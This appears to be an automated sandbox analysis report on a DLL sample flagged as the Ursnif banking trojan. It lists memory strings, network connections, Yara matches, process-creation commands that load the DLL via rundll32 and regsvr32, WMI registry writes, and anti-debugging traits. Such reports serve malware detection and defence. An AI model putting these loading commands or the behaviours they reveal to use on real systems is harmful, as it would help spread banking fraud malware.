                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;t
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/
                      Source: ~DF1C59239F0C65121E.TMP.4.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/26-j%c3%a4hriger-mann-stirbt-nach-sturz-auf-vorpla
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/eye-tracking-bei-online-pr%c3%bcfungen-keiner-%c3%
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/k%c3%b6nnen-seil-oder-hochbahnen-z%c3%bcrichs-verk
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/mehr-sicherheit-und-weniger-versp%c3%a4tungen-im-f
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wer-bekommt-im-kanton-z%c3%bcrich-pr%c3%a4mienverb
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/berufung-zum-professor-ohne-doktortitel/ar-AAKEMiw?ocid=hplocal
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/der-singende-snowboader/ar-AAKFmIQ?ocid=hplocalnews
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/gr%c3%bcne-fordern-regierung-soll-zeitungen-f%c3%b6rdern/ar-AAK
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/junger-mann-stirbt-nach-sturz-von-einer-mauer-bei-der-eth/ar-AA
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/news/other/walt-disney-sprach-ihn-an-und-pl%c3%b6tzlich-stand-sein-leben-k
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport/nachrichten/schweiz-unterliegt-deutschland-im-penaltyschiessen/ar-AA
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com/de-ch/sport?ocid=StripeOCID
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skype.com/
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/de/download-skype
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
                      Source: de-ch[1].htm.6.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
                      Source: iab2Data[1].json.6.drString found in binary or memory: https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html
                      Source: 52-478955-68ddb2ab[1].js.6.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49703 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49716 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49717 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49718 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49719 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.473399116.0000000005658000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3864, type: MEMORY
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.414055560.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.421428339.0000000003120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.424668518.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.3.rundll32.exe.3128d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.regsvr32.exe.30b8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e200000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.5e8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e200000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2d78d03.0.raw.unpack, type: UNPACKEDPE

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.473399116.0000000005658000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3864, type: MEMORY
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.414055560.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.421428339.0000000003120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.424668518.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.3.rundll32.exe.3128d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.regsvr32.exe.30b8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e200000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.5e8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e200000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2d78d03.0.raw.unpack, type: UNPACKEDPE

                      System Summary:

                      barindex
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E201B89 NtMapViewOfSection,0_2_6E201B89
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2018D1 GetProcAddress,NtCreateSection,memset,0_2_6E2018D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E202485 NtQueryVirtualMemory,0_2_6E202485
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E202485 NtQueryVirtualMemory,2_2_6E202485
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2022640_2_6E202264
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2452500_2_6E245250
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2576750_2_6E257675
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E255CC10_2_6E255CC1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E255DE10_2_6E255DE1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24D8400_2_6E24D840
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2022642_2_6E202264
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2452502_2_6E245250
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2576752_2_6E257675
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E255CC12_2_6E255CC1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E255DE12_2_6E255DE1
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E24D8402_2_6E24D840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2452503_2_6E245250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2576753_2_6E257675
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E255CC13_2_6E255CC1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E255DE13_2_6E255DE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24D8403_2_6E24D840
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E2452505_2_6E245250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E2576755_2_6E257675
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E255CC15_2_6E255CC1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E255DE15_2_6E255DE1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E24D8405_2_6E24D840
                      Source: C:\Windows\System32\loaddll32.exeCode function: String function: 6E247990 appears 37 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 6E247990 appears 37 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E250930 appears 36 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 6E247990 appears 74 times
                      Source: racial.dllBinary or memory string: OriginalFilenameRoad.dll8 vs racial.dll
                      Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: racial.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: racial.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal84.troj.winDLL@15/127@10/3
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF68CE0292F979F001.TMPJump to behavior
                      Source: racial.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                      Source: racial.dllVirustotal: Detection: 23%
                      Source: racial.dllReversingLabs: Detection: 31%
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\racial.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServer
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17410 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17426 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\racial.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\racial.dll',#1Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17410 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2212 CREDAT:17426 /prefetch:2Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: racial.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: racial.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Steam\Egg\332\people\Spec\Road.pdb source: loaddll32.exe, 00000000.00000002.473191457.000000006E259000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.471562632.000000006E259000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.473947664.000000006E259000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.475828227.000000006E259000.00000002.00020000.sdmp, racial.dll
                      Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: racial.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E201F31 LoadLibraryA,GetProcAddress,0_2_6E201F31
                      Source: racial.dllStatic PE information: real checksum: 0x86142 should be: 0x8350e
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\racial.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E202200 push ecx; ret 0_2_6E202209
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E202253 push ecx; ret 0_2_6E202263
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E210681 push edi; ret 0_2_6E210682
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2106D9 push ebp; retf 0_2_6E2106EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2117A4 push esp; ret 0_2_6E2117A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E210483 pushad ; ret 0_2_6E210497
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E20E541 push ebx; ret 0_2_6E20E542
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E211AED pushad ; ret 0_2_6E211AF9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E20F039 push ebx; retf 0_2_6E20F08E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E21016F push esp; iretd 0_2_6E2101ED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E20E18A push esp; ret 0_2_6E20E18B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E202200 push ecx; ret 2_2_6E202209
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E202253 push ecx; ret 2_2_6E202263
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E210681 push edi; ret 2_2_6E210682
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2106D9 push ebp; retf 2_2_6E2106EC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2117A4 push esp; ret 2_2_6E2117A5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E210483 pushad ; ret 2_2_6E210497
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E20E541 push ebx; ret 2_2_6E20E542
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E211AED pushad ; ret 2_2_6E211AF9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E20F039 push ebx; retf 2_2_6E20F08E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E21016F push esp; iretd 2_2_6E2101ED
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E20E18A push esp; ret 2_2_6E20E18B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E210681 push edi; ret 3_2_6E210682
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2106D9 push ebp; retf 3_2_6E2106EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2117A4 push esp; ret 3_2_6E2117A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E210483 pushad ; ret 3_2_6E210497
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20E541 push ebx; ret 3_2_6E20E542
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E211AED pushad ; ret 3_2_6E211AF9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20F039 push ebx; retf 3_2_6E20F08E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E21016F push esp; iretd 3_2_6E2101ED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E20E18A push esp; ret 3_2_6E20E18B

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000002.473399116.0000000005658000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3864, type: MEMORY
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000002.00000003.409632514.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.414055560.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.421428339.0000000003120000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.424668518.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.3.rundll32.exe.3128d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.regsvr32.exe.30b8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e200000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.6e200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.5e8d03.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e200000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2d78d03.0.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5012Thread sleep count: 61 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exe TID: 5012Thread sleep count: 138 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\regsvr32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E250D7A FindFirstFileExW,0_2_6E250D7A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E250D7A FindFirstFileExW,2_2_6E250D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E250D7A FindFirstFileExW,3_2_6E250D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6E250D7A FindFirstFileExW,5_2_6E250D7A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24A5EE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E24A5EE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E201F31 LoadLibraryA,GetProcAddress,0_2_6E201F31
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E24C28B mov eax, dword ptr fs:[00000030h]0_2_6E24C28B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E250947 mov eax, dword ptr fs:[00000030h]0_2_6E250947
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2823C3 mov eax, dword ptr fs:[00000030h]0_2_6E2823C3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2822F9 mov eax, dword ptr fs:[00000030h]0_2_6E2822F9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E281F00 push dword ptr fs:[00000030h]0_2_6E281F00
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E24C28B mov eax, dword ptr fs:[00000030h]2_2_6E24C28B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E250947 mov eax, dword ptr fs:[00000030h]2_2_6E250947
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2823C3 mov eax, dword ptr fs:[00000030h]2_2_6E2823C3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E2822F9 mov eax, dword ptr fs:[00000030h]2_2_6E2822F9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_6E281F00 push dword ptr fs:[00000030h]2_2_6E281F00
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E24C28B mov eax, dword ptr fs:[00000030h]3_2_6E24C28B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E250947 mov eax, dword ptr fs:[00000030h]3_2_6E250947
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2823C3 mov eax, dword ptr fs:[00000030h]3_2_6E2823C3
